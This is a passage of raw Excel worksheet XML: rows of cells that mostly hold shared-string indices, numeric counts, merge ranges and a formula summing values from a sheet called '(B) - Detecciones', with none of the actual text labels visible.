        <v>58</v>
      </c>
      <c r="AG127" s="63" t="s">
        <v>58</v>
      </c>
      <c r="AH127" s="106"/>
    </row>
    <row r="128" ht="153.75" customHeight="1">
      <c r="A128" s="106"/>
      <c r="B128" s="42" t="s">
        <v>915</v>
      </c>
      <c r="C128" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D128" s="43" t="s">
        <v>932</v>
      </c>
      <c r="E128" s="43" t="s">
        <v>933</v>
      </c>
      <c r="F128" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G128" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H128" s="44" t="s">
        <v>934</v>
      </c>
      <c r="I128" s="44" t="s">
        <v>144</v>
      </c>
      <c r="J128" s="44" t="s">
        <v>935</v>
      </c>
      <c r="K128" s="105" t="s">
        <v>10</v>
      </c>
      <c r="L128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M128" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N128" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O128" s="56" t="s">
        <v>10</v>
      </c>
      <c r="P128" s="47" t="s">
        <v>307</v>
      </c>
      <c r="Q128" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R128" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S128" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T128" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U128" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V128" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W128" s="49">
        <v>2002749.0</v>
      </c>
      <c r="X128" s="49">
        <v>1.0</v>
      </c>
      <c r="Y128" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z128" s="46">
        <v>2002749.0</v>
      </c>
      <c r="AA128" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB128" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC128" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD128" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE128" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF128" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG128" s="63" t="s">
        <v>58</v>
      </c>
      <c r="AH128" s="106"/>
    </row>
    <row r="129" ht="153.75" customHeight="1">
      <c r="A129" s="106"/>
      <c r="B129" s="71" t="s">
        <v>915</v>
      </c>
      <c r="C129" s="72" t="s">
        <v>10</v>
      </c>
      <c r="D129" s="72" t="s">
        <v>936</v>
      </c>
      <c r="E129" s="72" t="s">
        <v>937</v>
      </c>
      <c r="F129" s="72" t="s">
        <v>938</v>
      </c>
      <c r="G129" s="72" t="s">
        <v>939</v>
      </c>
      <c r="H129" s="74" t="s">
        <v>940</v>
      </c>
      <c r="I129" s="74" t="s">
        <v>941</v>
      </c>
      <c r="J129" s="74" t="s">
        <v>942</v>
      </c>
      <c r="K129" s="75">
        <v>459.0</v>
      </c>
      <c r="L129" s="75">
        <v>1.0</v>
      </c>
      <c r="M129" s="75">
        <v>1.0</v>
      </c>
      <c r="N129" s="76" t="s">
        <v>10</v>
      </c>
      <c r="O129" s="77" t="s">
        <v>943</v>
      </c>
      <c r="P129" s="77">
        <v>5.0</v>
      </c>
      <c r="Q129" s="77">
        <v>15.0</v>
      </c>
      <c r="R129" s="76" t="s">
        <v>10</v>
      </c>
      <c r="S129" s="78" t="s">
        <v>944</v>
      </c>
      <c r="T129" s="78">
        <v>8.0</v>
      </c>
      <c r="U129" s="78">
        <v>25.0</v>
      </c>
      <c r="V129" s="76" t="s">
        <v>10</v>
      </c>
      <c r="W129" s="79" t="s">
        <v>945</v>
      </c>
      <c r="X129" s="79">
        <v>16.0</v>
      </c>
      <c r="Y129" s="79">
        <v>31.0</v>
      </c>
      <c r="Z129" s="76" t="s">
        <v>587</v>
      </c>
      <c r="AA129" s="80" t="s">
        <v>54</v>
      </c>
      <c r="AB129" s="81" t="s">
        <v>946</v>
      </c>
      <c r="AC129" s="81" t="s">
        <v>10</v>
      </c>
      <c r="AD129" s="81" t="s">
        <v>106</v>
      </c>
      <c r="AE129" s="107" t="s">
        <v>54</v>
      </c>
      <c r="AF129" s="107" t="s">
        <v>58</v>
      </c>
      <c r="AG129" s="82" t="s">
        <v>58</v>
      </c>
      <c r="AH129" s="106"/>
    </row>
    <row r="132">
      <c r="B132" s="108" t="s">
        <v>947</v>
      </c>
      <c r="C132" s="109"/>
      <c r="D132" s="110"/>
      <c r="E132" s="7"/>
      <c r="F132" s="108" t="s">
        <v>948</v>
      </c>
      <c r="G132" s="109"/>
      <c r="H132" s="109"/>
      <c r="I132" s="109"/>
      <c r="J132" s="109"/>
      <c r="K132" s="110"/>
      <c r="M132" s="111" t="s">
        <v>949</v>
      </c>
      <c r="N132" s="109"/>
      <c r="O132" s="110"/>
      <c r="Q132" s="111" t="s">
        <v>950</v>
      </c>
      <c r="R132" s="109"/>
      <c r="S132" s="110"/>
    </row>
    <row r="133">
      <c r="B133" s="112"/>
      <c r="C133" s="113"/>
      <c r="D133" s="114"/>
      <c r="E133" s="7"/>
      <c r="F133" s="112"/>
      <c r="G133" s="113"/>
      <c r="H133" s="113"/>
      <c r="I133" s="113"/>
      <c r="J133" s="113"/>
      <c r="K133" s="114"/>
      <c r="L133" s="106"/>
      <c r="M133" s="112"/>
      <c r="N133" s="113"/>
      <c r="O133" s="114"/>
      <c r="Q133" s="112"/>
      <c r="R133" s="113"/>
      <c r="S133" s="114"/>
    </row>
    <row r="134" ht="17.25" customHeight="1">
      <c r="L134" s="106"/>
      <c r="M134" s="106"/>
    </row>
    <row r="136">
      <c r="B136" s="115" t="s">
        <v>181</v>
      </c>
      <c r="C136" s="116" t="s">
        <v>188</v>
      </c>
      <c r="D136" s="117" t="s">
        <v>163</v>
      </c>
      <c r="F136" s="115" t="s">
        <v>951</v>
      </c>
      <c r="G136" s="116">
        <v>1.0</v>
      </c>
      <c r="H136" s="116">
        <v>2.0</v>
      </c>
      <c r="I136" s="116">
        <v>3.0</v>
      </c>
      <c r="J136" s="116">
        <v>4.0</v>
      </c>
      <c r="K136" s="117">
        <v>5.0</v>
      </c>
      <c r="M136" s="118" t="s">
        <v>952</v>
      </c>
      <c r="N136" s="119" t="s">
        <v>953</v>
      </c>
      <c r="O136" s="120" t="s">
        <v>954</v>
      </c>
      <c r="Q136" s="121" t="s">
        <v>955</v>
      </c>
      <c r="R136" s="122"/>
      <c r="S136" s="123"/>
    </row>
    <row r="137">
      <c r="B137" s="124" t="s">
        <v>956</v>
      </c>
      <c r="C137" s="125" t="s">
        <v>957</v>
      </c>
      <c r="D137" s="126" t="s">
        <v>958</v>
      </c>
      <c r="F137" s="127" t="s">
        <v>959</v>
      </c>
      <c r="G137" s="128" t="s">
        <v>960</v>
      </c>
      <c r="H137" s="128" t="s">
        <v>961</v>
      </c>
      <c r="I137" s="128" t="s">
        <v>962</v>
      </c>
      <c r="J137" s="128" t="s">
        <v>963</v>
      </c>
      <c r="K137" s="129" t="s">
        <v>964</v>
      </c>
      <c r="M137" s="127" t="s">
        <v>965</v>
      </c>
      <c r="N137" s="128" t="s">
        <v>966</v>
      </c>
      <c r="O137" s="129" t="s">
        <v>967</v>
      </c>
      <c r="Q137" s="130" t="s">
        <v>968</v>
      </c>
      <c r="R137" s="122"/>
      <c r="S137" s="123"/>
    </row>
    <row r="138">
      <c r="M138" s="6"/>
      <c r="N138" s="6"/>
    </row>
    <row r="139">
      <c r="M139" s="6"/>
      <c r="N139" s="6"/>
    </row>
    <row r="140">
      <c r="M140" s="6"/>
      <c r="N140" s="6"/>
    </row>
    <row r="141">
      <c r="M141" s="6"/>
      <c r="N141" s="6"/>
    </row>
    <row r="142">
      <c r="M142" s="6"/>
      <c r="N142" s="6"/>
    </row>
    <row r="143">
      <c r="M143" s="6"/>
      <c r="N143" s="6"/>
    </row>
    <row r="144">
      <c r="M144" s="6"/>
      <c r="N144" s="6"/>
    </row>
    <row r="145">
      <c r="M145" s="6"/>
      <c r="N145" s="6"/>
    </row>
    <row r="150">
      <c r="C150" s="131"/>
    </row>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="Q132:S133"/>
    <mergeCell ref="Q136:S136"/>
    <mergeCell ref="Q137:S137"/>
    <mergeCell ref="K2:N2"/>
    <mergeCell ref="O2:R2"/>
    <mergeCell ref="S2:V2"/>
    <mergeCell ref="W2:Z2"/>
    <mergeCell ref="B132:D133"/>
    <mergeCell ref="F132:K133"/>
    <mergeCell ref="M132:O133"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="AC5"/>
    <hyperlink r:id="rId2" ref="AC14"/>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25"/>
    <col customWidth="1" min="2" max="4" width="27.25"/>
    <col customWidth="1" min="5" max="5" width="25.88"/>
    <col customWidth="1" min="6" max="6" width="25.25"/>
    <col customWidth="1" min="7" max="7" width="27.75"/>
    <col customWidth="1" min="8" max="8" width="24.75"/>
    <col customWidth="1" min="9" max="9" width="31.88"/>
    <col customWidth="1" min="10" max="10" width="26.38"/>
    <col customWidth="1" min="11" max="11" width="32.25"/>
    <col customWidth="1" min="12" max="12" width="24.88"/>
    <col customWidth="1" min="13" max="13" width="26.0"/>
    <col customWidth="1" min="15" max="15" width="56.5"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="132"/>
      <c r="B1" s="132"/>
      <c r="C1" s="132"/>
      <c r="D1" s="132"/>
      <c r="E1" s="133"/>
      <c r="F1" s="133"/>
      <c r="G1" s="25"/>
      <c r="H1" s="25"/>
      <c r="I1" s="25"/>
      <c r="J1" s="25"/>
      <c r="K1" s="25"/>
      <c r="L1" s="25"/>
      <c r="M1" s="25"/>
      <c r="N1" s="133"/>
      <c r="O1" s="133"/>
    </row>
    <row r="2">
      <c r="A2" s="133"/>
      <c r="B2" s="133"/>
      <c r="C2" s="133"/>
      <c r="D2" s="133"/>
      <c r="E2" s="134" t="s">
        <v>4</v>
      </c>
      <c r="F2" s="123"/>
      <c r="G2" s="135" t="s">
        <v>5</v>
      </c>
      <c r="H2" s="113"/>
      <c r="I2" s="135" t="s">
        <v>6</v>
      </c>
      <c r="J2" s="113"/>
      <c r="K2" s="135" t="s">
        <v>7</v>
      </c>
      <c r="L2" s="113"/>
      <c r="M2" s="136"/>
      <c r="N2" s="133"/>
      <c r="O2" s="133"/>
    </row>
    <row r="3" ht="32.25" customHeight="1">
      <c r="A3" s="137" t="s">
        <v>969</v>
      </c>
      <c r="B3" s="138" t="s">
        <v>970</v>
      </c>
      <c r="C3" s="138" t="s">
        <v>971</v>
      </c>
      <c r="D3" s="138" t="s">
        <v>972</v>
      </c>
      <c r="E3" s="138" t="s">
        <v>973</v>
      </c>
      <c r="F3" s="138" t="s">
        <v>974</v>
      </c>
      <c r="G3" s="137" t="s">
        <v>973</v>
      </c>
      <c r="H3" s="138" t="s">
        <v>974</v>
      </c>
      <c r="I3" s="137" t="s">
        <v>973</v>
      </c>
      <c r="J3" s="138" t="s">
        <v>974</v>
      </c>
      <c r="K3" s="137" t="s">
        <v>973</v>
      </c>
      <c r="L3" s="138" t="s">
        <v>974</v>
      </c>
      <c r="M3" s="139" t="s">
        <v>975</v>
      </c>
      <c r="N3" s="140"/>
      <c r="O3" s="140"/>
      <c r="P3" s="141"/>
      <c r="Q3" s="141"/>
      <c r="R3" s="141"/>
    </row>
    <row r="4">
      <c r="A4" s="142" t="s">
        <v>976</v>
      </c>
      <c r="B4" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C4" s="143" t="s">
        <v>978</v>
      </c>
      <c r="D4" s="143" t="s">
        <v>979</v>
      </c>
      <c r="E4" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F4" s="143">
        <v>0.0</v>
      </c>
      <c r="G4" s="44" t="s">
        <v>10</v>
      </c>
      <c r="H4" s="143">
        <v>0.0</v>
      </c>
      <c r="I4" s="44" t="s">
        <v>10</v>
      </c>
      <c r="J4" s="143">
        <v>0.0</v>
      </c>
      <c r="K4" s="144" t="s">
        <v>980</v>
      </c>
      <c r="L4" s="143">
        <v>1.0</v>
      </c>
      <c r="M4" s="145" t="s">
        <v>58</v>
      </c>
      <c r="N4" s="140"/>
      <c r="O4" s="140"/>
      <c r="P4" s="141"/>
      <c r="Q4" s="141"/>
      <c r="R4" s="141"/>
    </row>
    <row r="5">
      <c r="A5" s="142" t="s">
        <v>981</v>
      </c>
      <c r="B5" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C5" s="143" t="s">
        <v>978</v>
      </c>
      <c r="D5" s="143" t="s">
        <v>982</v>
      </c>
      <c r="E5" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F5" s="143">
        <v>0.0</v>
      </c>
      <c r="G5" s="44" t="s">
        <v>10</v>
      </c>
      <c r="H5" s="143">
        <v>0.0</v>
      </c>
      <c r="I5" s="44" t="s">
        <v>10</v>
      </c>
      <c r="J5" s="143">
        <v>0.0</v>
      </c>
      <c r="K5" s="143" t="s">
        <v>983</v>
      </c>
      <c r="L5" s="143">
        <v>3.0</v>
      </c>
      <c r="M5" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N5" s="140"/>
      <c r="O5" s="140"/>
      <c r="P5" s="141"/>
      <c r="Q5" s="141"/>
      <c r="R5" s="141"/>
    </row>
    <row r="6">
      <c r="A6" s="142" t="s">
        <v>984</v>
      </c>
      <c r="B6" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C6" s="143" t="s">
        <v>978</v>
      </c>
      <c r="D6" s="143" t="s">
        <v>985</v>
      </c>
      <c r="E6" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F6" s="143">
        <v>0.0</v>
      </c>
      <c r="G6" s="44" t="s">
        <v>10</v>
      </c>
      <c r="H6" s="143">
        <v>0.0</v>
      </c>
      <c r="I6" s="143">
        <v>51037.0</v>
      </c>
      <c r="J6" s="143">
        <v>1.0</v>
      </c>
      <c r="K6" s="143" t="s">
        <v>986</v>
      </c>
      <c r="L6" s="143">
        <v>4.0</v>
      </c>
      <c r="M6" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N6" s="140"/>
      <c r="O6" s="140"/>
      <c r="P6" s="141"/>
      <c r="Q6" s="141"/>
      <c r="R6" s="141"/>
    </row>
    <row r="7">
      <c r="A7" s="142" t="s">
        <v>987</v>
      </c>
      <c r="B7" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C7" s="143" t="s">
        <v>988</v>
      </c>
      <c r="D7" s="143" t="s">
        <v>989</v>
      </c>
      <c r="E7" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F7" s="143">
        <v>0.0</v>
      </c>
      <c r="G7" s="44" t="s">
        <v>990</v>
      </c>
      <c r="H7" s="143">
        <v>10.0</v>
      </c>
      <c r="I7" s="143" t="s">
        <v>990</v>
      </c>
      <c r="J7" s="143"/>
      <c r="K7" s="143" t="s">
        <v>991</v>
      </c>
      <c r="L7" s="143">
        <v>29.0</v>
      </c>
      <c r="M7" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N7" s="140"/>
      <c r="O7" s="140"/>
      <c r="P7" s="141"/>
      <c r="Q7" s="141"/>
      <c r="R7" s="141"/>
    </row>
    <row r="8">
      <c r="A8" s="142" t="s">
        <v>992</v>
      </c>
      <c r="B8" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C8" s="143" t="s">
        <v>988</v>
      </c>
      <c r="D8" s="143" t="s">
        <v>993</v>
      </c>
      <c r="E8" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F8" s="143">
        <v>0.0</v>
      </c>
      <c r="G8" s="44" t="s">
        <v>994</v>
      </c>
      <c r="H8" s="143">
        <v>2.0</v>
      </c>
      <c r="I8" s="143" t="s">
        <v>994</v>
      </c>
      <c r="J8" s="143">
        <v>2.0</v>
      </c>
      <c r="K8" s="143" t="s">
        <v>995</v>
      </c>
      <c r="L8" s="143">
        <v>14.0</v>
      </c>
      <c r="M8" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N8" s="140"/>
      <c r="O8" s="140"/>
      <c r="P8" s="141"/>
      <c r="Q8" s="141"/>
      <c r="R8" s="141"/>
    </row>
    <row r="9">
      <c r="A9" s="142" t="s">
        <v>996</v>
      </c>
      <c r="B9" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C9" s="143" t="s">
        <v>988</v>
      </c>
      <c r="D9" s="143" t="s">
        <v>997</v>
      </c>
      <c r="E9" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F9" s="143">
        <v>0.0</v>
      </c>
      <c r="G9" s="44" t="s">
        <v>998</v>
      </c>
      <c r="H9" s="143">
        <v>5.0</v>
      </c>
      <c r="I9" s="143" t="s">
        <v>998</v>
      </c>
      <c r="J9" s="143">
        <v>5.0</v>
      </c>
      <c r="K9" s="143" t="s">
        <v>999</v>
      </c>
      <c r="L9" s="143">
        <v>20.0</v>
      </c>
      <c r="M9" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N9" s="140"/>
      <c r="O9" s="140"/>
      <c r="P9" s="141"/>
      <c r="Q9" s="141"/>
      <c r="R9" s="141"/>
    </row>
    <row r="10">
      <c r="A10" s="142" t="s">
        <v>1000</v>
      </c>
      <c r="B10" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C10" s="143" t="s">
        <v>988</v>
      </c>
      <c r="D10" s="143" t="s">
        <v>1001</v>
      </c>
      <c r="E10" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F10" s="143">
        <v>0.0</v>
      </c>
      <c r="G10" s="44" t="s">
        <v>1002</v>
      </c>
      <c r="H10" s="143">
        <v>3.0</v>
      </c>
      <c r="I10" s="143" t="s">
        <v>1002</v>
      </c>
      <c r="J10" s="143">
        <v>3.0</v>
      </c>
      <c r="K10" s="143" t="s">
        <v>1003</v>
      </c>
      <c r="L10" s="143">
        <v>20.0</v>
      </c>
      <c r="M10" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N10" s="140"/>
      <c r="O10" s="140"/>
      <c r="P10" s="141"/>
      <c r="Q10" s="141"/>
      <c r="R10" s="141"/>
    </row>
    <row r="11">
      <c r="A11" s="142" t="s">
        <v>1004</v>
      </c>
      <c r="B11" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C11" s="143" t="s">
        <v>988</v>
      </c>
      <c r="D11" s="143" t="s">
        <v>1005</v>
      </c>
      <c r="E11" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F11" s="143">
        <v>0.0</v>
      </c>
      <c r="G11" s="44" t="s">
        <v>1006</v>
      </c>
      <c r="H11" s="143">
        <v>4.0</v>
      </c>
      <c r="I11" s="143" t="s">
        <v>1006</v>
      </c>
      <c r="J11" s="143">
        <v>4.0</v>
      </c>
      <c r="K11" s="143" t="s">
        <v>1007</v>
      </c>
      <c r="L11" s="143">
        <v>19.0</v>
      </c>
      <c r="M11" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N11" s="140"/>
      <c r="O11" s="140"/>
      <c r="P11" s="141"/>
      <c r="Q11" s="141"/>
      <c r="R11" s="141"/>
    </row>
    <row r="12">
      <c r="A12" s="142" t="s">
        <v>1008</v>
      </c>
      <c r="B12" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C12" s="143" t="s">
        <v>988</v>
      </c>
      <c r="D12" s="143" t="s">
        <v>1009</v>
      </c>
      <c r="E12" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F12" s="143">
        <v>0.0</v>
      </c>
      <c r="G12" s="44" t="s">
        <v>1010</v>
      </c>
      <c r="H12" s="143">
        <v>5.0</v>
      </c>
      <c r="I12" s="143" t="s">
        <v>1010</v>
      </c>
      <c r="J12" s="143">
        <v>5.0</v>
      </c>
      <c r="K12" s="143" t="s">
        <v>1011</v>
      </c>
      <c r="L12" s="143">
        <v>24.0</v>
      </c>
      <c r="M12" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N12" s="140"/>
      <c r="O12" s="140"/>
      <c r="P12" s="141"/>
      <c r="Q12" s="141"/>
      <c r="R12" s="141"/>
    </row>
    <row r="13">
      <c r="A13" s="142" t="s">
        <v>1012</v>
      </c>
      <c r="B13" s="143" t="s">
        <v>977</v>
      </c>
      <c r="C13" s="143" t="s">
        <v>988</v>
      </c>
      <c r="D13" s="143" t="s">
        <v>1013</v>
      </c>
      <c r="E13" s="44" t="s">
        <v>10</v>
      </c>
      <c r="F13" s="143">
        <v>0.0</v>
      </c>
      <c r="G13" s="44" t="s">
        <v>1006</v>
      </c>
      <c r="H13" s="143">
        <v>4.0</v>
      </c>
      <c r="I13" s="143" t="s">
        <v>1006</v>
      </c>
      <c r="J13" s="143">
        <v>4.0</v>
      </c>
      <c r="K13" s="143" t="s">
        <v>1014</v>
      </c>
      <c r="L13" s="143">
        <v>22.0</v>
      </c>
      <c r="M13" s="145" t="s">
        <v>54</v>
      </c>
      <c r="N13" s="140"/>
      <c r="O13" s="140"/>
      <c r="P13" s="141"/>
      <c r="Q13" s="141"/>
      <c r="R13" s="141"/>
    </row>
    <row r="14">
      <c r="A14" s="146" t="s">
        <v>1015</v>
      </c>
      <c r="B14" s="147" t="s">
        <v>10</v>
      </c>
      <c r="C14" s="147" t="s">
        <v>10</v>
      </c>
      <c r="D14" s="147" t="s">
        <v>10</v>
      </c>
      <c r="E14" s="74" t="s">
        <v>10</v>
      </c>
      <c r="F14" s="148">
        <v>0.0</v>
      </c>
      <c r="G14" s="74" t="s">
        <v>1016</v>
      </c>
      <c r="H14" s="148">
        <v>14.0</v>
      </c>
      <c r="I14" s="149" t="s">
        <v>1017</v>
      </c>
      <c r="J14" s="148">
        <v>15.0</v>
      </c>
      <c r="K14" s="149" t="s">
        <v>1018</v>
      </c>
      <c r="L14" s="148">
        <v>43.0</v>
      </c>
      <c r="M14" s="150" t="s">
        <v>10</v>
      </c>
      <c r="N14" s="133"/>
      <c r="O14" s="133"/>
    </row>
    <row r="15">
      <c r="N15" s="133"/>
      <c r="O15" s="133"/>
    </row>
    <row r="16">
      <c r="A16" s="133"/>
      <c r="B16" s="133"/>
      <c r="C16" s="133"/>
      <c r="D16" s="133"/>
      <c r="E16" s="133"/>
      <c r="F16" s="133"/>
      <c r="G16" s="133"/>
      <c r="H16" s="133"/>
      <c r="I16" s="133"/>
      <c r="J16" s="133"/>
      <c r="K16" s="133"/>
      <c r="L16" s="133"/>
      <c r="M16" s="133"/>
      <c r="N16" s="133"/>
      <c r="O16" s="133"/>
    </row>
    <row r="17">
      <c r="A17" s="133"/>
      <c r="B17" s="133"/>
      <c r="C17" s="133"/>
      <c r="D17" s="133"/>
      <c r="E17" s="133"/>
      <c r="F17" s="133"/>
      <c r="G17" s="133"/>
      <c r="H17" s="133"/>
      <c r="I17" s="133"/>
      <c r="J17" s="151"/>
      <c r="K17" s="133"/>
      <c r="L17" s="133"/>
      <c r="M17" s="133"/>
      <c r="N17" s="133"/>
      <c r="O17" s="133"/>
    </row>
    <row r="18">
      <c r="A18" s="133"/>
      <c r="B18" s="133"/>
      <c r="C18" s="133"/>
      <c r="D18" s="133"/>
      <c r="E18" s="133"/>
      <c r="F18" s="133"/>
      <c r="G18" s="133"/>
      <c r="H18" s="133"/>
      <c r="I18" s="133"/>
      <c r="J18" s="133"/>
      <c r="K18" s="133"/>
      <c r="L18" s="133"/>
      <c r="M18" s="133"/>
      <c r="N18" s="133"/>
      <c r="O18" s="133"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="E2:F2"/>
    <mergeCell ref="G2:H2"/>
    <mergeCell ref="I2:J2"/>
    <mergeCell ref="K2:L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25"/>
    <col customWidth="1" min="4" max="4" width="13.88"/>
    <col customWidth="1" min="5" max="5" width="14.0"/>
    <col customWidth="1" min="6" max="6" width="20.13"/>
    <col customWidth="1" min="7" max="7" width="14.0"/>
    <col customWidth="1" min="8" max="8" width="17.13"/>
    <col customWidth="1" min="9" max="10" width="28.75"/>
    <col customWidth="1" min="15" max="15" width="18.88"/>
    <col customWidth="1" min="17" max="17" width="27.13"/>
    <col customWidth="1" min="22" max="22" width="18.88"/>
    <col customWidth="1" min="24" max="24" width="29.38"/>
    <col customWidth="1" min="31" max="31" width="21.75"/>
  </cols>
  <sheetData>
    <row r="8">
      <c r="C8" s="152" t="s">
        <v>1019</v>
      </c>
      <c r="D8" s="122"/>
      <c r="E8" s="122"/>
      <c r="F8" s="123"/>
      <c r="G8" s="153"/>
      <c r="H8" s="153"/>
      <c r="I8" s="154"/>
      <c r="J8" s="155" t="s">
        <v>1020</v>
      </c>
      <c r="K8" s="122"/>
      <c r="L8" s="122"/>
      <c r="M8" s="122"/>
      <c r="N8" s="122"/>
      <c r="O8" s="123"/>
      <c r="Q8" s="155" t="s">
        <v>1021</v>
      </c>
      <c r="R8" s="122"/>
      <c r="S8" s="122"/>
      <c r="T8" s="122"/>
      <c r="U8" s="122"/>
      <c r="V8" s="123"/>
      <c r="X8" s="155" t="s">
        <v>1022</v>
      </c>
      <c r="Y8" s="122"/>
      <c r="Z8" s="122"/>
      <c r="AA8" s="122"/>
      <c r="AB8" s="122"/>
      <c r="AC8" s="123"/>
      <c r="AE8" s="155" t="s">
        <v>1023</v>
      </c>
      <c r="AF8" s="122"/>
      <c r="AG8" s="122"/>
      <c r="AH8" s="122"/>
      <c r="AI8" s="123"/>
      <c r="AJ8" s="154"/>
      <c r="AK8" s="154"/>
      <c r="AL8" s="154"/>
      <c r="AM8" s="154"/>
      <c r="AN8" s="154"/>
      <c r="AO8" s="154"/>
      <c r="AP8" s="154"/>
      <c r="AQ8" s="154"/>
      <c r="AR8" s="154"/>
      <c r="AS8" s="154"/>
    </row>
    <row r="9">
      <c r="C9" s="156" t="s">
        <v>1024</v>
      </c>
      <c r="D9" s="157" t="s">
        <v>14</v>
      </c>
      <c r="E9" s="157" t="s">
        <v>12</v>
      </c>
      <c r="F9" s="158" t="s">
        <v>16</v>
      </c>
      <c r="G9" s="159"/>
      <c r="H9" s="159"/>
      <c r="I9" s="159"/>
      <c r="J9" s="156" t="s">
        <v>1025</v>
      </c>
      <c r="K9" s="157" t="s">
        <v>4</v>
      </c>
      <c r="L9" s="157" t="s">
        <v>5</v>
      </c>
      <c r="M9" s="157" t="s">
        <v>6</v>
      </c>
      <c r="N9" s="157" t="s">
        <v>7</v>
      </c>
      <c r="O9" s="158" t="s">
        <v>1026</v>
      </c>
      <c r="Q9" s="156" t="s">
        <v>1025</v>
      </c>
      <c r="R9" s="157" t="s">
        <v>4</v>
      </c>
      <c r="S9" s="157" t="s">
        <v>5</v>
      </c>
      <c r="T9" s="157" t="s">
        <v>6</v>
      </c>
      <c r="U9" s="157" t="s">
        <v>7</v>
      </c>
      <c r="V9" s="158" t="s">
        <v>1027</v>
      </c>
      <c r="X9" s="156" t="s">
        <v>1025</v>
      </c>
      <c r="Y9" s="157" t="s">
        <v>4</v>
      </c>
      <c r="Z9" s="157" t="s">
        <v>5</v>
      </c>
      <c r="AA9" s="157" t="s">
        <v>6</v>
      </c>
      <c r="AB9" s="157" t="s">
        <v>7</v>
      </c>
      <c r="AC9" s="158" t="s">
        <v>1028</v>
      </c>
      <c r="AE9" s="156" t="s">
        <v>1025</v>
      </c>
      <c r="AF9" s="157" t="s">
        <v>4</v>
      </c>
      <c r="AG9" s="157" t="s">
        <v>5</v>
      </c>
      <c r="AH9" s="157" t="s">
        <v>6</v>
      </c>
      <c r="AI9" s="158" t="s">
        <v>7</v>
      </c>
      <c r="AJ9" s="159"/>
      <c r="AK9" s="159"/>
      <c r="AL9" s="159"/>
      <c r="AM9" s="159"/>
      <c r="AN9" s="159"/>
      <c r="AO9" s="159"/>
      <c r="AP9" s="159"/>
      <c r="AQ9" s="159"/>
      <c r="AR9" s="159"/>
      <c r="AS9" s="159"/>
    </row>
    <row r="10" ht="19.5" customHeight="1">
      <c r="C10" s="160">
        <v>4022.0</v>
      </c>
      <c r="D10" s="161">
        <v>35763.0</v>
      </c>
      <c r="E10" s="161">
        <v>41529.0</v>
      </c>
      <c r="F10" s="162">
        <v>12067.0</v>
      </c>
      <c r="G10" s="163"/>
      <c r="H10" s="163"/>
      <c r="I10" s="163"/>
      <c r="J10" s="164" t="s">
        <v>41</v>
      </c>
      <c r="K10" s="165">
        <v>1.0</v>
      </c>
      <c r="L10" s="165">
        <v>2.0</v>
      </c>
      <c r="M10" s="165">
        <v>2.0</v>
      </c>
      <c r="N10" s="165">
        <v>2.0</v>
      </c>
      <c r="O10" s="166">
        <v>4.0</v>
      </c>
      <c r="Q10" s="164" t="s">
        <v>41</v>
      </c>
      <c r="R10" s="165">
        <v>1.0</v>
      </c>
      <c r="S10" s="165">
        <v>3.0</v>
      </c>
      <c r="T10" s="165">
        <v>4.0</v>
      </c>
      <c r="U10" s="165">
        <v>4.0</v>
      </c>
      <c r="V10" s="166">
        <v>6.0</v>
      </c>
      <c r="X10" s="164" t="s">
        <v>41</v>
      </c>
      <c r="Y10" s="165">
        <f>SUM('(B) - Detecciones'!L4:L9)</f>
        <v>46</v>
      </c>
      <c r="Z10" s="165">
        <f>SUM('(B) - Detecciones'!P4:P9)</f>
        <v>73</v>
      </c>
      <c r="AA10" s="165">
        <f>SUM('(B) - Detecciones'!T4:T9)</f>
        <v>87</v>
      </c>
      <c r="AB10" s="165">
        <f>SUM('(B) - Detecciones'!X4:X9)</f>
        <v>119</v>
      </c>
      <c r="AC10" s="166">
        <v>119.0</v>
      </c>
      <c r="AD10" s="165"/>
      <c r="AE10" s="164" t="s">
        <v>41</v>
      </c>
      <c r="AF10" s="167">
        <f t="shared" ref="AF10:AI10" si="1">Y10/$V10</f>
        <v>7.666666667</v>
      </c>
      <c r="AG10" s="167">
        <f t="shared" si="1"/>
        <v>12.16666667</v>
      </c>
      <c r="AH10" s="167">
        <f t="shared" si="1"/>
        <v>14.5</v>
      </c>
